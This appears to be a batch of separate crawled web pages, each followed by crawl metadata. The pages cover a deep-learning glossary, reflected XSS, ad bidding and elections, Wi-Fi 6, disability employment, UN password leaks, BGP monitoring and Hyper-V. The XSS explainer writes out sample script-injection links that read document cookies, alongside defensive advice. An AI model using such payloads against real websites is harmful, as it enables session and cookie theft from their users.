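print(probs, probs.sum())  # class probabilities summing to 1
```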
Variance —Occurs when the DNN overfits to the training data. The DNN fails to distinguish noise from pattern and models every variance in the training data. A model with high variance usually fails to accurately generalize to new data. Vector — A combination of values that are passed as inputs into an activation layer of a DNN. VGG-16 — A popular network architecture for CNNs. It simplifies the architecture of AlexNet and has a total of 16 layers. There are many pretrained VGG models which can be applied to novel use cases through transfer learning. Read the paper here. Xavier Initialization — Xavier initialization assigns the start weights in the first hidden layer so that the input signals reach deep into the neural network. It scales the weights based on the number of neurons and outputs. This way, it prevents the signal from either becoming too small or too large later in the network. YOLO — You Only Look Once, is an algorithm to identify objects in an image. Convolutions are used to determine the probability of an object being in a part of an image. Non-max suppression and anchor boxes are then used to correctly locate the objects. Read the paper here. I hope this dictionary helped you get a clearer understanding of the terms used in the deep learning world. Keep this guide handy when taking the Coursera Deep Learning Specialization to quickly look up terms and concepts.
<urn:uuid:a23cc711-cf7a-4844-9e0f-e83ac631c639>
CC-MAIN-2022-40
https://resources.experfy.com/ai-ml/the-deep-learning-dictionary/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00620.warc.gz
en
0.878581
3,220
3.046875
3
Non-Persistent cross-site scripting, or non-persistent XSS, also known as Reflected XSS, is one of the three major categories of XSS attacks; the others are persistent (or Stored) XSS and DOM-based XSS. In general, XSS attacks are based on the victim's browser trusting a legitimate, but vulnerable, website or web application (the general XSS premise). The reflected XSS condition is met when a website or web application employs user input in HTML pages returned to the user's browser without validating the input first. With Non-Persistent cross-site scripting, malicious code is executed by the victim's browser, and the payload is not stored anywhere; instead, it is returned as part of the response HTML that the server sends. Therefore, the victim is being tricked into sending malicious code to the vulnerable web application, which is then reflected back to the victim's browser where the XSS payload executes. Non-Persistent XSS is the most commonly carried out XSS attack, as the vulnerabilities which make it possible are more common than those which enable other types of XSS. Non-Persistent XSS is also called Type 1 XSS because the attack is carried out through a single request/response cycle.
Typical Steps in a Non-Persistent XSS Attack
a) Research
At this stage, the attacker searches for vulnerable websites that can be used to carry out the attack. A visual verification is conducted in order to determine if user input is used in the response HTML page, as in the following examples:
- Websites having search functionality and displaying the searched term on the HTML page returned with the results
- Websites with log on functionality, displaying the logged on user name on the returned HTML page
- Websites displaying information encoded in the HTTP headers, such as browser type and version
- Websites making use of DOM parameter values, such as values read from the page URL
Once a website is identified as being potentially vulnerable, the attackers try to inject script code into the relevant areas and verify if the script is returned in its original form (and executed). This process can either be manual or automatic, depending on the website/web application and the potential injection points found.
Examples of Malicious Code Delivery
1) Potential injection point: URL - Malicious example: a crafted link such as http://example.com/search?q=<script>alert(document.cookie)</script>, where the search term is echoed into the results page without encoding
2) Potential injection point: DOM - Malicious example: a link such as http://example.com/page#<script>alert(document.cookie)</script>, targeting a page that writes the URL fragment into the document without encoding it
b) Social engineering
Using social engineering, the attacker will influence the user into clicking on a crafted link that contains the malicious URL which injects code into vulnerable web pages/web applications, using one or more of the following techniques:
- Spam email containing a crafted link
- Spam email containing HTML code
- Malicious web pages containing a malicious URL
- Social media: messages/posts containing a malicious link
- XSS techniques: using Persistent (Stored) XSS, malicious links can be saved as part of forum posts/comments and reflected back to visiting users
- Other types of attacks: DNS rebinding, or compromising the hosts file so the browser is redirected to malicious pages instead of the intended web page, compromising the wireless router, etc.
c) Payload execution/consequences
Once the victim has clicked on the malicious link, and if the attack is successful, the payload will get executed in the victim's context and call home to the attacker in order to communicate the results, as well as upload stolen data, etc.
The consequences vary, because the attack enables execution of arbitrary code, usually with elevated privileges – most home users still use the default "administrator" account, and although the latest Windows operating systems come with user access control and hardened browser policies, these are usually disabled in order to improve the user experience. The usual targets of attacks are:
- Cookie theft – attackers can read authentication cookies that are still active, which can be used to perform further attacks.
- Data theft – attackers can read browser history, directory listings, and file contents, helping prepare for the next attacks or using the information in other malicious ways.
Defending Against Non-Persistent XSS
The best way to prevent cross-site scripting is to make sure that the web application does not make use of user input in the returned HTML pages without validating it first. Validation implies verification of the user input to determine if the input is valid according to its purpose. In case the validation functions find script tags, either in plain text or encoded, they should sanitize the input before it is passed on to the response HTML and make sure that the script is rendered harmless. The strength of the sanitization depends on the ability of the validation functions to identify scripts in the user input. With the increased dynamics in web page content, as well as web 2.0, keeping the web application XSS-free also involves regular assessment tests carried out using web vulnerability scanners that are able to perform penetration testing against the web application, identify XSS vulnerabilities, and provide the necessary information on how to fix them. Users should always be wary of what they click on; avoid playing seemingly harmless games, claiming random prizes, or opening emails that don't come from a trusted source. At the same time, users should avoid installing browser plugins which do not have a good reputation and those which are not really a necessity (such as toolbars), since these may make their browser vulnerable too. Using secure and up-to-date web browsers will also help users keep away from "victim" status. Vulnerable websites are just the medium – the real target is you.
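As a concrete illustration of the output-sanitization advice above, the following is a minimal, hypothetical sketch, not tied to any particular framework, showing how HTML-escaping user input before it is reflected into a response neutralizes a reflected XSS payload. Real applications should rely on their framework's built-in, context-aware escaping rather than hand-rolled code.

```python
import html

def render_search_results(query: str) -> str:
    # Reflecting raw input would let <script> payloads execute in the
    # victim's browser; html.escape turns the markup into inert text.
    safe_query = html.escape(query)
    return f"<p>You searched for: {safe_query}</p>"

if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"
    print(render_search_results(payload))
    # -> <p>You searched for: &lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>
```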
<urn:uuid:5f9fcfbc-aa45-4b83-805d-74059525472b>
CC-MAIN-2022-40
https://www.acunetix.com/blog/articles/non-persistent-xss/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00620.warc.gz
en
0.880804
1,329
3.421875
3
Update (April 2019): It was brought to my attention that the Brennan Center has used some of the research described in this article to file an amicus curiae (a legal opinion submitted to the appeals court) in a case touching on election protection from disinformation operations and political advertisement transparency. The rest of the article is left unchanged. Did you encounter a web, Facebook, or Twitter advertisement seemingly tailored to your interests or related to your recent actions on the web? Chances are this was delivered to you via Real-Time Bidding channels. I am involved in technical research and analysis of Real-Time Bidding systems and their potential influence on modern societies. However, there are also interesting policy aspects. The goal of this short note is to touch on one possible influence on democratic systems. For a simple description of Real-Time Bidding systems (RTB), please refer to one of my works. To simplify, there are four parties involved in the system:
- The user, who enters a web site, launches a mobile app, or uses some other marvel of technology capable of displaying online ads
- A web site or mobile app which includes web ads scripts
- A script provider, who operates the Real-Time Bidding system, the Ad Exchange
- A number (tens, hundreds) of bidders, who bid for the user's attention
After detecting that a user has entered a web site (mobile app, etc.), the Ad Exchange holds an auction: it sends some data about the user to the auction's bidders. Bidders evaluate the obtained data and decide if they want to display a message - typically an advertisement - to the user. They submit their bids, and all this happens fast (tens of milliseconds). At the end the user can see the message.
Creative uses of RTB
On a side note, Real-Time Bidding systems are not always used just to send web ads. Relatively recently, they have also proved very effective at serving malicious code (malware) to end users. Sadly, a wide range of examples highlight the problem. In general, it is widely known that even simple and perhaps innocuous differences in how information is presented can potentially have an influence on voters' decisions. Tying this to the fact that users might have problems with distinguishing content from ads raises an interesting question. What happens if users find it difficult to distinguish, for example, news material from actual ads? What if this happens during an electoral campaign? Real-Time Bidding provides very fine-grained targeting capabilities. Aside from receiving information on the user from the Ad Exchange (during the auction phase), bidders are known to have their own databases, possibly obtained from Data Brokers. It is possible to target based on gender, education level, occupation, income, type of interests, location, and so on. It is also possible to target based on political inclinations. "I think it's pretty safe to say that had a substantial impact on the election (...) you're looking at swaying the votes of the very prized few who matter the most", says a representative of one of the advertising companies.
Imagine a situation in which external players from country X's agency suddenly start targeting users in a particular country Y, prior to or during an election campaign. Such campaigns could be executed cost-efficiently. And what about a situation in which an agency of country X registers as a bidder on an Ad Exchange system? The technical ability of external players to influence a democratic process cannot be ruled out. As more and more ads are being served using targeting, via means such as RTB, this is a debate that is hard to avoid. Real-Time Bidding provides rich capabilities for serving content to users. While there are security, privacy and transparency questions, the infrastructure and technical capabilities pose interesting issues. It is interesting to see if - or when - we will encounter the use of Real-Time Bidding in disinformation or information warfare.
<urn:uuid:1ee1cd46-ca14-48a5-b3cf-9554f1524b75>
CC-MAIN-2022-40
https://blog.lukaszolejnik.com/soft-influence-on-societies/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00620.warc.gz
en
0.948058
891
2.53125
3
The Institute of Electrical and Electronics Engineers (IEEE) is the organization responsible for the standards that define modern wireless enterprise networks, for example, WLANs. Industry interests are coordinated through the Wi-Fi Alliance. They select the subset of features that become the minimum set of features for certified hardware, software, and devices. They also control the use of trademarks.

The IEEE uses a unique numbering sequence for every standard. The 802 standard is for networking but is further broken down into 22 subparts. 802.11 is the sub-part for wireless networking. Over the past 20 years, the 802.11 standard has been updated many times, beginning with revision 802.11a and continuing through 802.11ax. Some of the updates addressed specific technical shortcomings (for example, QoS) of the original standard, while others substantially changed fundamentals of the wireless protocol (for example, QAM modulation). In retrospect, the fundamental changes were generational changes. The new Wi-Fi generation names are simply the IEEE and Wi-Fi Alliance acknowledging the benefit of explicitly identifying the major generational changes within the 802.11 specification family. See the table below.

|Wi-Fi generation|802.11 revision|
|Wi-Fi 3|802.11a, g|
|Wi-Fi 4|802.11n|
|Wi-Fi 5|802.11ac|
|Wi-Fi 6|802.11ax|

The technical changes equip Wi-Fi 6 to handle very high user device density per access point (AP) and the demands of 4K and 8K streaming video or multiuser virtual/augmented reality (VR/AR). There are four significant changes. The first three changes are only applicable to 802.11ax APs communicating with 802.11ax user devices. The first change is an increase from 4 x 4 MIMO to 8 x 8 MIMO that can direct the eight data streams to a single user (achieving higher peak speed) or simultaneously assign one data stream to each of eight users, for example, multi-user MIMO (achieving lower average latency). The second is an increase in the RF signal modulation from 256 quadrature amplitude modulation (QAM) to 1024 QAM for 25 percent higher peak speeds for users in close proximity to the AP. The third change adds scheduling to the OFDM (becoming OFDMA) to provide deterministic use of the time-frequency resources when all devices are participating in MU-MIMO. The fourth change uses the increased number of antennas required to support 8 x 8 MIMO to provide more directional beamforming and allows more effective noise suppression (maximum ratio combining [MRC]), providing benefit to all users, including legacy users.

802.11ax still uses the original Carrier Sense Multiple Access (CSMA) technique using Clear Channel Assessment (CCA). CCA/CSMA is contention-based, not deterministic, and is the root cause of most Wi-Fi latency and jitter issues. When all devices are 802.11ax, the CCA thresholds can be adjusted for higher average AP capacity – with the trade-off of potentially lower peak speeds.

Enterprise WLANs should be upgraded on a six- or seven-year cycle to avoid network equipment end of life (EOL) or end of support (EOS). If you have a validated use case involving high user density and streaming video, then Wi-Fi 6 is the obvious choice. If your usage scenarios are more typical enterprise applications, then upgrade with current mainstream equipment – Wi-Fi 5 or Wi-Fi 6.
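As a rough illustration of where the quoted 25 percent modulation gain comes from, the sketch below computes illustrative peak PHY rates from bits per symbol, coding rate, subcarrier count, spatial streams, and symbol timing. The subcarrier count and symbol duration are simplified assumptions for an 80 MHz channel, not vendor specifications, and both cases deliberately use the same timing so that only the modulation differs: moving from 256-QAM (8 bits per symbol) to 1024-QAM (10 bits per symbol) scales the rate by 10/8 = 1.25.

```python
def peak_phy_rate_gbps(bits_per_symbol, coding_rate, data_subcarriers,
                       symbol_time_us, spatial_streams):
    """Very simplified peak PHY rate: bits per OFDM symbol divided by symbol time."""
    bits_per_ofdm_symbol = bits_per_symbol * coding_rate * data_subcarriers * spatial_streams
    return bits_per_ofdm_symbol / symbol_time_us / 1000  # Mbps -> Gbps

# Assumed example parameters for an 80 MHz channel, 4 spatial streams (illustrative only).
rate_256qam = peak_phy_rate_gbps(bits_per_symbol=8,  coding_rate=5 / 6,
                                 data_subcarriers=234, symbol_time_us=3.6,
                                 spatial_streams=4)
rate_1024qam = peak_phy_rate_gbps(bits_per_symbol=10, coding_rate=5 / 6,
                                  data_subcarriers=234, symbol_time_us=3.6,
                                  spatial_streams=4)

print(f"256-QAM,  4 streams: ~{rate_256qam:.2f} Gbps")
print(f"1024-QAM, 4 streams: ~{rate_1024qam:.2f} Gbps")
print(f"Gain from modulation alone: {rate_1024qam / rate_256qam:.2f}x")  # 10/8 = 1.25
```

Real 802.11ax rates also change the OFDMA numerology (more, narrower subcarriers and longer symbols), so published peak figures differ; the sketch isolates the modulation factor only.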
<urn:uuid:f80ace3e-5f47-4fca-8d0d-5be2ad99474e>
CC-MAIN-2022-40
https://www.blackbox.com/en-gb/insights/blogs/detail/bbns/2019/12/04/wi-fi-6-what-is-it
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00620.warc.gz
en
0.886699
776
3.078125
3
This October is the 75th year America has observed National Disability Employment Awareness Month (NDEAM). Like other “awareness months,” NDEAM spotlights a disparity in the workforce—in this case, the lower than average employment rates of Persons with Disabilities (PWDs). NDEAM works to lessen this inequity through workshops, seminars, and online resources. This year also marks the 30th anniversary of the Americans With Disabilities Act (ADA). The United States has made significant progress, thanks to the tireless work of activists and advocates for the disabled community, but unfortunately, we will need to continue to call attention to NDEAM and the ADA until a truly equitable workforce is finally achieved. An inequitable workforce According to the Centers for Disease Control and Prevention (CDC), PWDs make up approximately 26% of the adult population in the United States (this is approximately the same percentage of all non-White minorities combined). This number includes D/deaf and blind Americans, wheelchair users, neurodiverse persons, and people with age-related disabilities. One out of every four adults in this country, or 61 million people, have some sort of disability and yet this vast, diverse community continues to be denied basic workplace equality and accessibility (and it is expected that the number of PWDs is set to double in the next twenty years). The U.S. unemployment rate among PWDs is roughly twice as high as the national unemployment rate, and the numbers are even higher amongst people with certain types of disabilities. Gallaudet University reports that people with “severe hearing problems” have an unemployment rate of 41% to as high as 52%. If we are striving for an equitable society where the workforce accurately and fairly reflects the entire adult population, we have a long way to go and need to continue to raise awareness. This year’s NDEAM theme is “Increasing Access and Opportunity.” I am intimately familiar with the challenges to access because I have been profoundly deaf since birth. Growing up in the late 1980s and 1990s, access was almost always an uphill battle. As a child, my parents and I had to fight for access and inclusive opportunities; for example, captioning. I did not always have access to captioned live events or feel comfortable asking for a seat closer to the speaker so I could lip-read. Luckily, I have witnessed a shift and for the most part, I can now request such services and my needs will be met without being made to feel like an inconvenience (though certainly not always). In my UX Design career today, I strive to create designs that are as inclusive as possible because it’s personal. As an IBMer on the Accessibility team, I help create tools that make accessibility easy for teams to learn and apply. My role within Accessibility at IBM is not just a job; it’s a passion and a calling. Inclusive Design is about equalizing experiences and products for those who have different needs or barriers (disabilities). The term “disability” should not refer to people being “defective,” but rather how they must operate in an environment that doesn’t cater, or has barriers, to their needs. For example, if a place only has stairs, a wheelchair user encounters a barrier, but a ramp or elevator erases that barrier. Until access requests disappear because they are consistently acknowledged, anticipated, and made readily available, our community will need to continue to raise awareness. Why hire PWDs? 
Diversity on teams and in leadership positions provides companies with fresh perspectives and an authentic understanding of their clients' needs. This leads to new ideas and innovation, which allow companies to maintain a competitive edge. The benefits of a diverse, more inclusive workforce are becoming more and more apparent and widely accepted. For example, in her book, Make Room For Her, Rebecca Shambaugh points to research that shows companies with women on their boards perform better: their profits are greater; they are more likely to attract and retain top talent; and they are better able to grow and maintain a competitive edge. The same positive benefits would certainly result from hiring more PWDs; whether they have visible or invisible disabilities, these are valuable perspectives that can contribute to a more inclusive and equitable workforce, not to mention a more diverse customer/client base. When you hire people with different backgrounds, you are more likely to design and create products and services that cater to a wider, more diverse range of the consumer population.

IBM is deeply proud of its long and storied history in hiring and, perhaps more importantly, recognizing the value that PWDs bring to the workforce. Internally we use the term "Persons with Diverse Abilities" (PWDAs) to highlight the fact that diversity brings in different perspectives, which is hugely beneficial for innovation—the heart of what we do at IBM! IBM also recognizes that it would be financially irresponsible to create products that deny access to more than a quarter of the population. By hiring PWDAs, IBM ensures its products reflect all possible customers. Who better to design for, communicate with, and sell to these potential consumers than PWDAs? Access leads to opportunities, which generate more innovative and creative tools, products, and services.

National Disability Employment Awareness Month is a crucial observance of the importance and benefits of incorporating accessibility, and implementing Inclusive Design, into workplaces and corporations at all levels of management and operation. I am grateful for the raised awareness during the month of October, but relish the thought of a future in which NDEAM is no longer needed.

For those familiar with generating or receiving compliance reports on the accessibility of technology products, the VPAT, or Voluntary Product Accessibility Template, is a familiar term. The VPAT form was created by the Information Technology Industry (ITI) Council for companies to report how well their technology products and services meet widely adopted accessibility standards. The […]

Positivity changes hearts and minds and culture. We still have a long way to go. But as we celebrate the 31st anniversary of the Americans with Disabilities Act, I wanted to step back and celebrate how far we've come.

IBM remembers Dr. Brent Shiver. His perspective as a Deaf person was an essential part of his impact: "Because of my deafness, I see the world differently from my colleagues and can make technical and innovative contributions from angles not usually considered."
<urn:uuid:19d693c0-d54c-4f88-b425-f5dcaa2c3513>
CC-MAIN-2022-40
https://www.ibm.com/blogs/age-and-ability/2020/10/26/ndeam/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00620.warc.gz
en
0.958836
1,330
2.59375
3
A couple of weeks ago, we covered the West Australian government's security audit here on the Octopus Blog. The section of the government audit covering cyber security practices unveiled some pretty disturbing facts. Given the opportunity, users will choose the most obvious, easiest-to-guess passwords, leaving them wide-open targets for cyber criminals. While the size and scope of this phenomenon were received with shock, no infosec professional worth his or her salt could really be surprised. Password-based authentication fosters bad security practices. This is a long-established fact. The truth is, the data collected in Australia's recent audit doesn't stand alone. Other recent findings have exposed another serious security issue passwords inevitably create.

The Vulnerabilities Pile Up
Passwords aren't only problematic when they themselves are weak. Passwords are essentially cryptographic secrets. These secrets need to be managed and stored. Even for individual users with multiple online accounts, this can be a difficult task. For a large organization with hundreds if not thousands of members, it becomes a major logistical hurdle. And here's where many organizations relying on passwords to protect identities end up failing.

This fact was made public most recently late last month, when security researcher Kushagra Pathank discovered openly accessible links to internal documents belonging to the United Nations. According to reports, UN employees made this breach possible by misconfiguring files on the popular project management service Trello, the tracking app Jira, and Google Docs. The mistake made these documents accessible to anyone with the proper link, rather than to specific authorized users only.

Pathank came across these documents by running simple search engine queries. The searches produced public Trello pages, some of which contained links to the public Google Docs and Jira pages. The data revealed in these documents contained passwords for various UN accounts, including the video conferencing system at the UN's language school, a web development environment for the UN's Office for the Coordination of Humanitarian Affairs, and access to UN websites currently under development. "In total, Pathank discovered some 50 boards and documents that he was able to access–all because of the flawed security settings implemented during their setup."

There are two important points to highlight from this story. The first is the shockingly low security standards of whoever was handling IT at the UN. One would expect that the largest, most influential diplomatic organization in the world would put in some more effort to secure documents containing so many credentials. To protect its passwords, the UN should have been using a password vault that utilizes a privileged access management approach. At the very least there should have been a second authentication factor in place to access these files.

But there is another, more important element that needs to be pointed out, and that's the fact that the UN is using passwords at all. It's because the UN is utilizing passwords that it had to resort to a form of managing them. And of course, whoever was in charge of that chose an easier, less secure option. Pathank–who has become quite an expert at identifying publicly accessible private files–explained that exposure of these types of files happens simply because leaving them unsecured is easier than securing them.
Users opt for "sharing the URL of the board without [actually adding users] to the board" since securely adding members with access "seems to be huge task for these people," Pathank said. This whole episode serves as another stark lesson in how password-based authentication leads to security problems. The good news is that the digital sphere no longer has to rely on passwords or deal with all of the vulnerabilities they create. Password-less, out-of-band authentication is the way of the future. With these tools, companies and private users alike can circumvent all the pitfalls of passwords and achieve network-wide authentication that is both seamless and more secure.
<urn:uuid:8a13b516-208b-4134-833e-571b1fbc5794>
CC-MAIN-2022-40
https://doubleoctopus.com/blog/general/the-un-unexpected-example-of-poor-password-management/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00620.warc.gz
en
0.947125
820
2.78125
3
The technological advances triggered by the pandemic offer us the opportunity for smart cities to thrive. Truly smart cities will be those that allow an open and interoperable exchange of data via the Internet of Things (IoT). According to IoT analytics, IoT connections reached 12 billion in 2020, surpassing non-IoT connections. 2021 will bring dramatic changes to how IoT is scaling. This is due to two drivers. Firstly, the health crisis brought to the fore the importance of data-driven strategic decisions for businesses in all sectors. Secondly, it is due to the proliferation of low-power wide-area network (LPWAN) wireless technology, specifically designed for M2M devices with low bandwidth at long range with resilient cellular networks – for example, gas and water supply data. The amount of data generated even by a small city is vast, and city officials must ensure that data at the origin, at rest and across all data exchanges is trusted and secure. For a device and its data to be truly trusted, security must be built in from the start. The familiar SIM already offers a tried-and-tested blueprint. Enhanced features with new SIM standards – such as embedded SIM (eSIM) that are soldered into the device and bolstered by GSMA IoT Safe – provide a way to safeguard businesses from disruptive outages or changes in suppliers while offering the device maker and service provider remote management. Innovations like integrated SIM (iSIM) help unlock entirely new IoT use cases while offering additional out-of-the-box functionality packaged with security for applications services to build on. This technology is already catalyzing new areas of innovation in urban mobility, bringing more e-bikes and e-scooters to our streets or smart tracking solutions that enable real-time visibility of critical goods and supplies. Trust frameworks and transparency will need to be woven into all IoT layers for our cities to dispel concerns and ensure these new technologies can help our smart cities thrive.
<urn:uuid:c90d0161-5555-4dd4-8254-49e0de6c9d75>
CC-MAIN-2022-40
https://kigen.com/resources/blog/solving-iot-trust-to-build-smarter-cities/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00620.warc.gz
en
0.927599
400
2.578125
3
As the routing protocol that runs the Internet, Border Gateway Protocol (BGP) is a key piece of the puzzle that helps you understand how your customers get to you. If you want to understand digital experience delivery, then you have to understand the Internet, and BGP visibility is very important if you intend to have operational insights for any business-critical app or service that you are either offering or consuming over the Internet. There are a range of varying claims to BGP visibility or monitoring out there, terms which are themselves quite vague. Consequently, it’s important to understand what types of BGP monitoring exist and how to distinguish them, as well as what key capabilities you need to look for. A (very) short introduction to BGP The BGP is a path vector routing protocol that (put very simply) concerns itself with two major functions: - Establishing routed peerings (communication sessions) between Autonomous Systems (or AS, networks that have registered to participate in the BGP fabric of the Internet), so they can exchange routing information to various prefixes (network addresses). There are currently over 63,000 AS Numbers (ASNs). - Propagating routes to IP prefixes across all those AS. Routes are defined not as paths through individual routers, but as paths through AS. So, when you look at a BGP routing update message, you’ll see a sequence of ASNs which forms an AS-PATH, corresponding to a specific prefix. A BGP routing update can contain multiple AS-PATHS for a prefix, along with multiple AS-Path attributes. Currently, the IPv4 BGP routing table for the Internet contains 768,385 prefixes. The importance of perspective There is an assumption about the Internet that, bar instances of filtering like China’s Great Firewall, you can reach anywhere from anywhere. But in fact the path Internet traffic takes will differ based on where it’s coming from, and a single routing vantage point can introduce inauthentic routes. If you want to get a clear picture of Internet routing it’s necessary to process a lot of different perspectives from different ISPs for global visibility. The growing popularity of BGP monitoring Understanding Internet performance is critical for effective network performance monitoring (NPM) and digital experience monitoring (DEM), and, in stark contrast to a few years ago, BGP monitoring is growing in popularity. Previously many NPM vendors would either actively advise against it or else ignore its existence. But with the rapidly growing prevalence of the cloud, being used to build apps and services, offering customer digital experiences, consuming SaaS, and modernizing your WAN, the necessity of BGP monitoring has become impossible to ignore. Global connectivity is a goal for any self-respecting competitive digital organization, meaning these businesses must also build expertise in interdomain routing, the resulting complex interactions with internal routing policies, BGP policies, and managing ISPs. Even the most skeptical of vendors have been turned around on BGP visibility. Before diving in to the different types of BGP monitoring products available, all of which offer varying degrees of insight into Internet routing behavior, it is helpful to know the key capabilities to look for to support DEM use-cases. 
Below are some metrics and visualizations that are needed on a time-series, historical basis:
1) Independent AS-PATH visualizations, for example, linked to higher-level monitoring against an app or service URL
- All prefixes related to monitoring test connectivity to that URL are automatically detected
- Prefix path changes
- Prefix reachability
- Prefix updates
2) Cross-layer correlation
- BGP routing data should be time-series correlated to other layers of data, including network-layer paths, end-to-end network performance metrics (packet loss, latency, jitter), and app-layer metrics (response time and page load)

BGP monitoring: Five execution types
But despite the fact that BGP has a clear definition as a protocol, the meaning of the term "BGP monitoring" can vary, depending on who's making the claim. Here are five ways that BGP routing data is offered as "visibility."
- BGP visibility toolkits: Some large organizations will use open source and commercial tools that perform BGP prefix monitoring on a standalone basis. However, these can be difficult for IT teams to use for troubleshooting application and service issues, as they are typically offered as data feeds. For meaningful troubleshooting capabilities, the IT team would need to integrate that data and perform its own correlation against other tools in the stack. It can also be hard to sift through the data from these toolkits, as the feeds can be filled with routing issues from the most unstable fringes of the Internet, creating a lot of useless noise. While this is technically legitimate BGP monitoring, it's not hugely useful to the average IT team.
- Light integration: This option involves integrating a feed of BGP routing attribute data into network-layer paths to enhance the path information. What follows can become an issue of semantics: it's possible to simply label various nodes in a Layer 3 path with the names of the ASNs they're in by doing prefix lookups against a single BGP routing feed. But this barely qualifies as "BGP monitoring" or "BGP visualization," since it doesn't enable you to visualize prefixes or AS-PATHs.
- BGP traffic analysis: This approach enhances traffic flow data by prefix-matching the source and destination IPs, then mapping to BGP attributes for those prefixes, resulting in oversight of traffic volume metrics from a source AS to a destination AS, and even via transit AS. This is without a doubt an interesting option and very useful if you're moving large volumes of service traffic to the Internet. But rather than monitoring or visualizing how BGP routing is working, it's focused on traffic analytics.
- Third-party open source tools: There are a range of external, open source tools, such as RIPEstat BGPlay, that some monitoring products link to. The upside of these is that they have BGP prefix analysis capability. But the downside is that, rather than allowing for ongoing monitoring, these tools mainly provide a snapshot view, which isn't integrated with the rest of the product workflow and is therefore not very useful for businesses.
- Integrated BGP route monitoring: This option means directly pulling collected global routing tables and updates on a frequent basis and integrating BGP prefix monitoring, reachability information and visualization of ASes, AS paths, path lengths and so forth, with other aspects of DEM so that it delivers insights in real time for app and service operations visibility.
This is the approach which will give you the most accurate perspective – providing as it does BGP routing data from many points on the Internet and utilizing intelligent algorithms. So, is your BGP monitoring for real? A quick hack to determine whether you’re looking at real BGP monitoring or a less than useful copy version is to search the product or vendor name, plus “BGP” and “prefix” and compare the results. This will quickly reveal who is up to speed and writing about real-world BGP issues relating to digital experience delivery; and who can provide useful insights into BGP routing and the Internet to help you as a business understand your digital experience delivery.
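As a toy illustration of the multi-vantage-point idea discussed above, the sketch below compares AS-PATH observations for one prefix as seen from several synthetic route collectors and flags path or origin changes. The collector names, prefix, and AS paths are made up for the example; a real implementation would consume live BGP feeds or an external routing data source rather than hard-coded snapshots.

```python
# Synthetic AS-PATH observations for one prefix from three vantage points,
# at two points in time (all ASNs and paths are illustrative).
snapshots = {
    "t0": {
        "collector-eu": [3356, 1299, 64500],
        "collector-us": [174, 1299, 64500],
        "collector-ap": [4637, 1299, 64500],
    },
    "t1": {
        "collector-eu": [3356, 1299, 64500],
        "collector-us": [174, 65001, 64500],   # path change via a new transit AS
        "collector-ap": [4637, 65002],         # different origin AS: possible hijack
    },
}

def analyze(prefix, before, after):
    """Compare two observation rounds and report anything worth alerting on."""
    alerts = []
    for collector, old_path in before.items():
        new_path = after.get(collector)
        if new_path is None:
            alerts.append(f"{collector}: prefix {prefix} no longer reachable")
        elif new_path[-1] != old_path[-1]:
            alerts.append(f"{collector}: origin AS changed {old_path[-1]} -> {new_path[-1]} (investigate)")
        elif new_path != old_path:
            alerts.append(f"{collector}: AS-PATH changed {old_path} -> {new_path}")
    return alerts

for alert in analyze("203.0.113.0/24", snapshots["t0"], snapshots["t1"]):
    print(alert)
```

Note how the origin change is only visible from one collector: with a single vantage point that event could easily be missed, which is why broad, multi-perspective collection matters.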
<urn:uuid:0453b688-2a77-4bc3-92fa-0df355cbc528>
CC-MAIN-2022-40
https://www.datacenterdynamics.com/en/opinions/why-border-gateway-protocol-bgp-visibility-more-critical-ever/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00620.warc.gz
en
0.923959
1,548
2.859375
3
Let's learn how to enable Hyper-V in Windows 11. Hyper-V specifically provides hardware virtualization. That means each virtual machine runs on virtual hardware. It lets you create virtual hard drives, virtual switches, and many other virtual devices, all of which can be added to virtual machines. Hyper-V is built into Windows as an optional feature; it is not enabled by default. As IT professionals or technology enthusiasts, many of you need to run multiple operating systems. Hyper-V lets you run multiple operating systems as virtual machines on Windows. It's recommended to check Hyper-V's system requirements before proceeding. Hyper-V can be enabled in many ways, including using the Control Panel, PowerShell, the command prompt, or the Deployment Image Servicing and Management (DISM) tool.
Read the Latest Information – Cloud PC Enable Windows Subsystem For Linux Android Sandbox And Hyper-V On Windows 11 HTMD Blog (anoopcnair.com)
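As a quick illustration of the scripted route, here is a minimal Python sketch that shells out to DISM to enable the Hyper-V feature. It assumes an elevated (administrator) session on a Windows 11 edition that supports Hyper-V; the same DISM command can of course be run directly in a command prompt, and a reboot is typically required afterwards.

```python
import subprocess

# DISM command to enable the Hyper-V optional feature (Windows only, run elevated).
cmd = ["DISM", "/Online", "/Enable-Feature", "/All", "/FeatureName:Microsoft-Hyper-V"]

result = subprocess.run(cmd, capture_output=True, text=True)
print(result.stdout)
if result.returncode != 0:
    print("DISM failed:", result.stderr or result.stdout)
else:
    print("Hyper-V feature enabled; restart Windows to complete the installation.")
```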
<urn:uuid:d214ea5c-a095-48bf-a1a9-b8cbda1b21c2>
CC-MAIN-2022-40
https://howtomanagedevices.com/windows-11/7441/enable-hyper-v-feature/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00620.warc.gz
en
0.825238
203
2.8125
3
In the previous section we reviewed several aspects of the Transport Layer. We learned a great deal of information, covering sockets, ports, TCP, UDP, segments, and datagrams. Now we will take a look at the fourth and final layer of the TCP/IP stack: the Application Layer.

What Does The Application Layer Do?
